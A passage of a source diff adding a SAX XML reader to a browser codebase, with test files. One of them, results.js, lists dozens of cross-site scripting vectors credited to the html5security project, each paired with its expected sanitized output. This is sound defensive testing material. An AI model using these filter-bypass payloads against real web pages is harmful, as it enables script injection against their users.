NS_ENSURE_STATE(mListener); + nsresult rv = mListener->OnStopRequest(aRequest, aContext, status); + mListener = nullptr; + mIsAsyncParse = false; + return rv; +} + +// nsIStreamListener + +NS_IMETHODIMP +nsSAXXMLReader::OnDataAvailable(nsIRequest *aRequest, nsISupports *aContext, + nsIInputStream *aInputStream, uint64_t offset, + uint32_t count) +{ + NS_ENSURE_TRUE(mIsAsyncParse, NS_ERROR_FAILURE); + NS_ENSURE_STATE(mListener); + return mListener->OnDataAvailable(aRequest, aContext, aInputStream, offset, + count); +} + +nsresult +nsSAXXMLReader::InitParser(nsIRequestObserver *aObserver, nsIChannel *aChannel) +{ + nsresult rv; + + // setup the parser + nsCOMPtr<nsIParser> parser = do_CreateInstance(kParserCID, &rv); + NS_ENSURE_SUCCESS(rv, rv); + + parser->SetContentSink(this); + + int32_t charsetSource = kCharsetFromDocTypeDefault; + nsAutoCString charset(NS_LITERAL_CSTRING("UTF-8")); + TryChannelCharset(aChannel, charsetSource, charset); + parser->SetDocumentCharset(charset, charsetSource); + + rv = parser->Parse(mBaseURI, aObserver); + NS_ENSURE_SUCCESS(rv, rv); + + mListener = do_QueryInterface(parser, &rv); + + return rv; +} + +// from nsDocument.cpp +bool +nsSAXXMLReader::TryChannelCharset(nsIChannel *aChannel, + int32_t& aCharsetSource, + nsACString& aCharset) +{ + if (aCharsetSource >= kCharsetFromChannel) + return true; + + if (aChannel) { + nsAutoCString charsetVal; + nsresult rv = aChannel->GetContentCharset(charsetVal); + if (NS_SUCCEEDED(rv)) { + nsAutoCString preferred; + if (!EncodingUtils::FindEncodingForLabel(charsetVal, preferred)) + return false; + + aCharset = preferred; + aCharsetSource = kCharsetFromChannel; + return true; + } + } + + return false; +} + +nsresult +nsSAXXMLReader::EnsureBaseURI() +{ + if (mBaseURI) + return NS_OK; + + return NS_NewURI(getter_AddRefs(mBaseURI), "about:blank"); +} + +nsresult +nsSAXXMLReader::SplitExpatName(const char16_t *aExpatName, + nsString &aURI, + nsString &aLocalName, + nsString &aQName) +{ + /** + * Adapted from RDFContentSinkImpl + * + * Expat can send the following: + * localName + * namespaceURI<separator>localName + * namespaceURI<separator>localName<separator>prefix + * + * and we use 0xFFFF for the <separator>. + * + */ + + NS_ASSERTION(aExpatName, "null passed to handler"); + nsDependentString expatStr(aExpatName); + int32_t break1, break2 = kNotFound; + break1 = expatStr.FindChar(char16_t(0xFFFF)); + + if (break1 == kNotFound) { + aLocalName = expatStr; // no namespace + aURI.Truncate(); + aQName = expatStr; + } else { + aURI = StringHead(expatStr, break1); + break2 = expatStr.FindChar(char16_t(0xFFFF), break1 + 1); + if (break2 == kNotFound) { // namespace, but no prefix + aLocalName = Substring(expatStr, break1 + 1); + aQName = aLocalName; + } else { // namespace with prefix + aLocalName = Substring(expatStr, break1 + 1, break2 - break1 - 1); + aQName = Substring(expatStr, break2 + 1) + + NS_LITERAL_STRING(":") + aLocalName; + } + } + + return NS_OK; +} diff --git a/parser/xml/nsSAXXMLReader.h b/parser/xml/nsSAXXMLReader.h new file mode 100644 index 000000000..763f787e5 --- /dev/null +++ b/parser/xml/nsSAXXMLReader.h @@ -0,0 +1,105 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#ifndef nsSAXXMLReader_h__ +#define nsSAXXMLReader_h__ + +#include "nsCOMPtr.h" +#include "nsIContentSink.h" +#include "nsIExtendedExpatSink.h" +#include "nsIParser.h" +#include "nsIURI.h" +#include "nsISAXXMLReader.h" +#include "nsISAXContentHandler.h" +#include "nsISAXDTDHandler.h" +#include "nsISAXErrorHandler.h" +#include "nsISAXLexicalHandler.h" +#include "nsIMozSAXXMLDeclarationHandler.h" +#include "nsCycleCollectionParticipant.h" +#include "mozilla/Attributes.h" + +#define NS_SAXXMLREADER_CONTRACTID "@mozilla.org/saxparser/xmlreader;1" +#define NS_SAXXMLREADER_CID \ +{ 0xab1da296, 0x6125, 0x40ba, \ +{ 0x96, 0xd0, 0x47, 0xa8, 0x28, 0x2a, 0xe3, 0xdb} } + +class nsSAXXMLReader final : public nsISAXXMLReader, + public nsIExtendedExpatSink, + public nsIContentSink +{ +public: + NS_DECL_CYCLE_COLLECTING_ISUPPORTS + NS_DECL_CYCLE_COLLECTION_CLASS_AMBIGUOUS(nsSAXXMLReader, nsISAXXMLReader) + NS_DECL_NSIEXPATSINK + NS_DECL_NSIEXTENDEDEXPATSINK + NS_DECL_NSISAXXMLREADER + NS_DECL_NSIREQUESTOBSERVER + NS_DECL_NSISTREAMLISTENER + + nsSAXXMLReader(); + + //nsIContentSink + NS_IMETHOD WillParse() override + { + return NS_OK; + } + + NS_IMETHOD WillBuildModel(nsDTDMode aDTDMode) override; + NS_IMETHOD DidBuildModel(bool aTerminated) override; + NS_IMETHOD SetParser(nsParserBase* aParser) override; + + NS_IMETHOD WillInterrupt() override + { + return NS_OK; + } + + NS_IMETHOD WillResume() override + { + return NS_OK; + } + + virtual void FlushPendingNotifications(mozFlushType aType) override + { + } + + NS_IMETHOD SetDocumentCharset(nsACString& aCharset) override + { + return NS_OK; + } + + virtual nsISupports *GetTarget() override + { + return nullptr; + } + +private: + ~nsSAXXMLReader() {} + + nsCOMPtr<nsISAXContentHandler> mContentHandler; + nsCOMPtr<nsISAXDTDHandler> mDTDHandler; + nsCOMPtr<nsISAXErrorHandler> mErrorHandler; + nsCOMPtr<nsISAXLexicalHandler> mLexicalHandler; + nsCOMPtr<nsIMozSAXXMLDeclarationHandler> mDeclarationHandler; + nsCOMPtr<nsIURI> mBaseURI; + nsCOMPtr<nsIStreamListener> mListener; + nsCOMPtr<nsIRequestObserver> mParserObserver; + bool mIsAsyncParse; + static bool TryChannelCharset(nsIChannel *aChannel, + int32_t& aCharsetSource, + nsACString& aCharset); + nsresult EnsureBaseURI(); + nsresult InitParser(nsIRequestObserver *aListener, nsIChannel *aChannel); + nsresult SplitExpatName(const char16_t *aExpatName, + nsString &aURI, + nsString &aLocalName, + nsString &aQName); + nsString mPublicId; + nsString mSystemId; + + // Feature flags + bool mEnableNamespacePrefixes; +}; + +#endif // nsSAXXMLReader_h__ diff --git a/parser/xml/test/moz.build b/parser/xml/test/moz.build new file mode 100644 index 000000000..20c00e9aa --- /dev/null +++ b/parser/xml/test/moz.build @@ -0,0 +1,8 @@ +# -*- Mode: python; indent-tabs-mode: nil; tab-width: 40 -*- +# vim: set filetype=python: +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, You can obtain one at http://mozilla.org/MPL/2.0/. + +# Note: set the test module's name to test_<yourmodule> +XPCSHELL_TESTS_MANIFESTS += ['unit/xpcshell.ini'] diff --git a/parser/xml/test/unit/CC-BY-LICENSE b/parser/xml/test/unit/CC-BY-LICENSE new file mode 100644 index 000000000..d0ce194dc --- /dev/null +++ b/parser/xml/test/unit/CC-BY-LICENSE @@ -0,0 +1,59 @@ +Creative Commons Attribution 3.0 Unported License + +THE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS PROHIBITED. + +BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED TO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS. + +1. Definitions + + "Adaptation" means a work based upon the Work, or upon the Work and other pre-existing works, such as a translation, adaptation, derivative work, arrangement of music or other alterations of a literary or artistic work, or phonogram or performance and includes cinematographic adaptations or any other form in which the Work may be recast, transformed, or adapted including in any form recognizably derived from the original, except that a work that constitutes a Collection will not be considered an Adaptation for the purpose of this License. For the avoidance of doubt, where the Work is a musical work, performance or phonogram, the synchronization of the Work in timed-relation with a moving image ("synching") will be considered an Adaptation for the purpose of this License. + "Collection" means a collection of literary or artistic works, such as encyclopedias and anthologies, or performances, phonograms or broadcasts, or other works or subject matter other than works listed in Section 1(f) below, which, by reason of the selection and arrangement of their contents, constitute intellectual creations, in which the Work is included in its entirety in unmodified form along with one or more other contributions, each constituting separate and independent works in themselves, which together are assembled into a collective whole. A work that constitutes a Collection will not be considered an Adaptation (as defined above) for the purposes of this License. + "Distribute" means to make available to the public the original and copies of the Work or Adaptation, as appropriate, through sale or other transfer of ownership. + "Licensor" means the individual, individuals, entity or entities that offer(s) the Work under the terms of this License. + "Original Author" means, in the case of a literary or artistic work, the individual, individuals, entity or entities who created the Work or if no individual or entity can be identified, the publisher; and in addition (i) in the case of a performance the actors, singers, musicians, dancers, and other persons who act, sing, deliver, declaim, play in, interpret or otherwise perform literary or artistic works or expressions of folklore; (ii) in the case of a phonogram the producer being the person or legal entity who first fixes the sounds of a performance or other sounds; and, (iii) in the case of broadcasts, the organization that transmits the broadcast. + "Work" means the literary and/or artistic work offered under the terms of this License including without limitation any production in the literary, scientific and artistic domain, whatever may be the mode or form of its expression including digital form, such as a book, pamphlet and other writing; a lecture, address, sermon or other work of the same nature; a dramatic or dramatico-musical work; a choreographic work or entertainment in dumb show; a musical composition with or without words; a cinematographic work to which are assimilated works expressed by a process analogous to cinematography; a work of drawing, painting, architecture, sculpture, engraving or lithography; a photographic work to which are assimilated works expressed by a process analogous to photography; a work of applied art; an illustration, map, plan, sketch or three-dimensional work relative to geography, topography, architecture or science; a performance; a broadcast; a phonogram; a compilation of data to the extent it is protected as a copyrightable work; or a work performed by a variety or circus performer to the extent it is not otherwise considered a literary or artistic work. + "You" means an individual or entity exercising rights under this License who has not previously violated the terms of this License with respect to the Work, or who has received express permission from the Licensor to exercise rights under this License despite a previous violation. + "Publicly Perform" means to perform public recitations of the Work and to communicate to the public those public recitations, by any means or process, including by wire or wireless means or public digital performances; to make available to the public Works in such a way that members of the public may access these Works from a place and at a place individually chosen by them; to perform the Work to the public by any means or process and the communication to the public of the performances of the Work, including by public digital performance; to broadcast and rebroadcast the Work by any means including signs, sounds or images. + "Reproduce" means to make copies of the Work by any means including without limitation by sound or visual recordings and the right of fixation and reproducing fixations of the Work, including storage of a protected performance or phonogram in digital form or other electronic medium. + +2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit, or restrict any uses free from copyright or rights arising from limitations or exceptions that are provided for in connection with the copyright protection under copyright law or other applicable laws. + +3. License Grant. Subject to the terms and conditions of this License, Licensor hereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for the duration of the applicable copyright) license to exercise the rights in the Work as stated below: + + to Reproduce the Work, to incorporate the Work into one or more Collections, and to Reproduce the Work as incorporated in the Collections; + to create and Reproduce Adaptations provided that any such Adaptation, including any translation in any medium, takes reasonable steps to clearly label, demarcate or otherwise identify that changes were made to the original Work. For example, a translation could be marked "The original work was translated from English to Spanish," or a modification could indicate "The original work has been modified."; + to Distribute and Publicly Perform the Work including as incorporated in Collections; and, + to Distribute and Publicly Perform Adaptations. + + For the avoidance of doubt: + Non-waivable Compulsory License Schemes. In those jurisdictions in which the right to collect royalties through any statutory or compulsory licensing scheme cannot be waived, the Licensor reserves the exclusive right to collect such royalties for any exercise by You of the rights granted under this License; + Waivable Compulsory License Schemes. In those jurisdictions in which the right to collect royalties through any statutory or compulsory licensing scheme can be waived, the Licensor waives the exclusive right to collect such royalties for any exercise by You of the rights granted under this License; and, + Voluntary License Schemes. The Licensor waives the right to collect royalties, whether individually or, in the event that the Licensor is a member of a collecting society that administers voluntary licensing schemes, via that society, from any exercise by You of the rights granted under this License. + +The above rights may be exercised in all media and formats whether now known or hereafter devised. The above rights include the right to make such modifications as are technically necessary to exercise the rights in other media and formats. Subject to Section 8(f), all rights not expressly granted by Licensor are hereby reserved. + +4. Restrictions. The license granted in Section 3 above is expressly made subject to and limited by the following restrictions: + + You may Distribute or Publicly Perform the Work only under the terms of this License. You must include a copy of, or the Uniform Resource Identifier (URI) for, this License with every copy of the Work You Distribute or Publicly Perform. You may not offer or impose any terms on the Work that restrict the terms of this License or the ability of the recipient of the Work to exercise the rights granted to that recipient under the terms of the License. You may not sublicense the Work. You must keep intact all notices that refer to this License and to the disclaimer of warranties with every copy of the Work You Distribute or Publicly Perform. When You Distribute or Publicly Perform the Work, You may not impose any effective technological measures on the Work that restrict the ability of a recipient of the Work from You to exercise the rights granted to that recipient under the terms of the License. This Section 4(a) applies to the Work as incorporated in a Collection, but this does not require the Collection apart from the Work itself to be made subject to the terms of this License. If You create a Collection, upon notice from any Licensor You must, to the extent practicable, remove from the Collection any credit as required by Section 4(b), as requested. If You create an Adaptation, upon notice from any Licensor You must, to the extent practicable, remove from the Adaptation any credit as required by Section 4(b), as requested. + If You Distribute, or Publicly Perform the Work or any Adaptations or Collections, You must, unless a request has been made pursuant to Section 4(a), keep intact all copyright notices for the Work and provide, reasonable to the medium or means You are utilizing: (i) the name of the Original Author (or pseudonym, if applicable) if supplied, and/or if the Original Author and/or Licensor designate another party or parties (e.g., a sponsor institute, publishing entity, journal) for attribution ("Attribution Parties") in Licensor's copyright notice, terms of service or by other reasonable means, the name of such party or parties; (ii) the title of the Work if supplied; (iii) to the extent reasonably practicable, the URI, if any, that Licensor specifies to be associated with the Work, unless such URI does not refer to the copyright notice or licensing information for the Work; and (iv) , consistent with Section 3(b), in the case of an Adaptation, a credit identifying the use of the Work in the Adaptation (e.g., "French translation of the Work by Original Author," or "Screenplay based on original Work by Original Author"). The credit required by this Section 4 (b) may be implemented in any reasonable manner; provided, however, that in the case of a Adaptation or Collection, at a minimum such credit will appear, if a credit for all contributing authors of the Adaptation or Collection appears, then as part of these credits and in a manner at least as prominent as the credits for the other contributing authors. For the avoidance of doubt, You may only use the credit required by this Section for the purpose of attribution in the manner set out above and, by exercising Your rights under this License, You may not implicitly or explicitly assert or imply any connection with, sponsorship or endorsement by the Original Author, Licensor and/or Attribution Parties, as appropriate, of You or Your use of the Work, without the separate, express prior written permission of the Original Author, Licensor and/or Attribution Parties. + Except as otherwise agreed in writing by the Licensor or as may be otherwise permitted by applicable law, if You Reproduce, Distribute or Publicly Perform the Work either by itself or as part of any Adaptations or Collections, You must not distort, mutilate, modify or take other derogatory action in relation to the Work which would be prejudicial to the Original Author's honor or reputation. Licensor agrees that in those jurisdictions (e.g. Japan), in which any exercise of the right granted in Section 3(b) of this License (the right to make Adaptations) would be deemed to be a distortion, mutilation, modification or other derogatory action prejudicial to the Original Author's honor and reputation, the Licensor will waive or not assert, as appropriate, this Section, to the fullest extent permitted by the applicable national law, to enable You to reasonably exercise Your right under Section 3(b) of this License (right to make Adaptations) but not otherwise. + +5. Representations, Warranties and Disclaimer + +UNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE OF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU. + +6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. + +7. Termination + + This License and the rights granted hereunder will terminate automatically upon any breach by You of the terms of this License. Individuals or entities who have received Adaptations or Collections from You under this License, however, will not have their licenses terminated provided such individuals or entities remain in full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will survive any termination of this License. + Subject to the above terms and conditions, the license granted here is perpetual (for the duration of the applicable copyright in the Work). Notwithstanding the above, Licensor reserves the right to release the Work under different license terms or to stop distributing the Work at any time; provided, however that any such election will not serve to withdraw this License (or any other license that has been, or is required to be, granted under the terms of this License), and this License will continue in full force and effect unless terminated as stated above. + +8. Miscellaneous + + Each time You Distribute or Publicly Perform the Work or a Collection, the Licensor offers to the recipient a license to the Work on the same terms and conditions as the license granted to You under this License. + Each time You Distribute or Publicly Perform an Adaptation, Licensor offers to the recipient a license to the original Work on the same terms and conditions as the license granted to You under this License. + If any provision of this License is invalid or unenforceable under applicable law, it shall not affect the validity or enforceability of the remainder of the terms of this License, and without further action by the parties to this agreement, such provision shall be reformed to the minimum extent necessary to make such provision valid and enforceable. + No term or provision of this License shall be deemed waived and no breach consented to unless such waiver or consent shall be in writing and signed by the party to be charged with such waiver or consent. + This License constitutes the entire agreement between the parties with respect to the Work licensed here. There are no understandings, agreements or representations with respect to the Work not specified here. Licensor shall not be bound by any additional provisions that may appear in any communication from You. This License may not be modified without the mutual written agreement of the Licensor and You. + The rights granted under, and the subject matter referenced, in this License were drafted utilizing the terminology of the Berne Convention for the Protection of Literary and Artistic Works (as amended on September 28, 1979), the Rome Convention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances and Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised on July 24, 1971). These rights and subject matter take effect in the relevant jurisdiction in which the License terms are sought to be enforced according to the corresponding provisions of the implementation of those treaty provisions in the applicable national law. If the standard suite of rights granted under applicable copyright law includes additional rights not granted under this License, such additional rights are deemed to be included in the License; this License is not intended to restrict the license of any rights under applicable law. diff --git a/parser/xml/test/unit/results.js b/parser/xml/test/unit/results.js new file mode 100644 index 000000000..2a7735363 --- /dev/null +++ b/parser/xml/test/unit/results.js @@ -0,0 +1,844 @@ +// vectors by the html5security project (https://code.google.com/p/html5security/ & Creative Commons 3.0 BY), see CC-BY-LICENSE for the full license + +var vectors = [ + { + "data": "<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi", + "sanitized": "<html><head></head><body>&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi</body></html>" + }, + { + "data": "<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>", + "sanitized": "<html><head></head><body>&alert&A7&(1)&R&UA;&&<&A9&11/script&X&></body></html>" + }, + { + "data": "0?<script>Worker(\"#\").onmessage=message=>eval(message.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))", + "sanitized": "<html><head></head><body>0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))</body></html>" + }, + { + "data": "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<input onfocus=write(1) autofocus>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<input onblur=write(1) autofocus><input autofocus>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>", + "sanitized": "<html><head></head><body><a>X</a></body></html>" + }, + { + "data": "<video poster=javascript:alert(1)//></video>", + "sanitized": "<html><head></head><body><video poster=\"javascript:alert(1)//\" controls=\"controls\"></video></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:alert(1)\"></g></svg>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", + "sanitized": "<html><head></head><body><br><br><br><br><br><br>...<br><br><br><br></body></html>" + }, + { + "data": "<x repeat=\"template\" repeat-start=\"999999\">0<y repeat=\"template\" repeat-start=\"999999\">1</y></x>", + "sanitized": "<html><head></head><body>01</body></html>" + }, + { + "data": "<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<script>({0:#0=alert/#0#/#0#(0)})</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >", + "sanitized": "<html><head></head><body>X</body></html>" + }, + { + "data": "<?xml-stylesheet href=\"javascript:alert(1)\"?><root/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<script xmlns=\"http://www.w3.org/1999/xhtml\">alert(1)</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<meta charset=\"x-mac-farsi\">�script �alert(1)//�/script �", + "sanitized": "<html><head></head><body>�script �alert(1)//�/script �</body></html>" + }, + { + "data": "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<input onblur=focus() autofocus><input>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>", + "sanitized": "<html><head></head><body>1</body></html>" + }, + { + "data": "<script src=\"#\">{alert(1)}</script>;1", + "sanitized": "<html><head></head><body>;1</body></html>" + }, + { + "data": "+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);", + "sanitized": "<html><head></head><body>+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);</body></html>" + }, + { + "data": "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>", + "sanitized": "<html><head></head><body>1</body></html>" + }, + { + "data": "<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<frameset onload=alert(1)>", + "sanitized": "<html><head></head></html>" + }, + { + "data": "<table background=\"javascript:alert(1)\"></table>", + "sanitized": "<html><head></head><body><table></table></body></html>" + }, + { + "data": "<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(1);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>", + "sanitized": "<html><head></head><body><a></a><a>XXX</a><a>XXX</a></body></html>" + }, + { + "data": "1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>", + "sanitized": "<html><head></head><body>1</body></html>" + }, + { + "data": "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>", + "sanitized": "<html><head></head><body>1<a href=\"#\"></a></body></html>" + }, + { + "data": "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(1)\">XXX</a>", + "sanitized": "<html><head></head><body><a>XXX</a></body></html>" + }, + { + "data": "<!--<img src=\"--><img src=x onerror=alert(1)//\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<comment><img src=\"</comment><img src=x onerror=alert(1)//\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<!-- up to Opera 11.52, FF 3.6.28 -->\r\n<![><img src=\"]><img src=x onerror=alert(1)//\">\r\n\r\n<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->\r\n<svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>", + "sanitized": "<html><head></head><body><img>\n\n\n><image xlink:href=\"<img></body></html>" + }, + { + "data": "<style><img src=\"</style><img src=x onerror=alert(1)//\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<li style=list-style:url() onerror=alert(1)></li>\n<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", + "sanitized": "<html><head></head><body><li></li>\n<div></div></body></html>" + }, + { + "data": "<head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(1)//#\">XXX</a></body>", + "sanitized": "<html><head></head><body><a>XXX</a></body></html>" + }, + { + "data": "<?xml version=\"1.0\" standalone=\"no\"?>\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<style type=\"text/css\">\r\n@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}\r\n</style>\r\n</head>\r\n<body>Hello</body>\r\n</html>", + "sanitized": "<html><head>\n\n</head>\n<body>Hello\n</body></html>" + }, + { + "data": "<style>*[{}@import'test.css?]{color: green;}</style>X", + "sanitized": "<html><head></head><body>X</body></html>" + }, + { + "data": "<div style=\"font-family:'foo[a];color:red;';\">XXX</div>", + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" + }, + { + "data": "<div style=\"font-family:foo}color=red;\">XXX</div>", + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(1)</script></svg>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x style=\"behavior:url(test.sct)\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<xml id=\"xss\" src=\"test.htc\"></xml>\r\n<label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>", + "sanitized": "<html><head></head><body>\n<label></label></body></html>" + }, + { + "data": "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<video><source onerror=\"alert(1)\">", + "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>" + }, + { + "data": "<video onerror=\"alert(1)\"><source></source></video>", + "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>" + }, + { + "data": "<b <script>alert(1)//</script>0</script></b>", + "sanitized": "<html><head></head><body><b>alert(1)//0</b></body></html>" + }, + { + "data": "<b><script<b></b><alert(1)</script </b></b>", + "sanitized": "<html><head></head><body><b></b></body></html>" + }, + { + "data": "<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>", + "sanitized": "<html><head></head><body><div id=\"div1\"></div> <div id=\"div2\"></div></body></html>" + }, + { + "data": "<div style=\"[a]color[b]:[c]red\">XXX</div>", + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" + }, + { + "data": "<div style=\"\\63	\\06f
\\0006c\\00006F
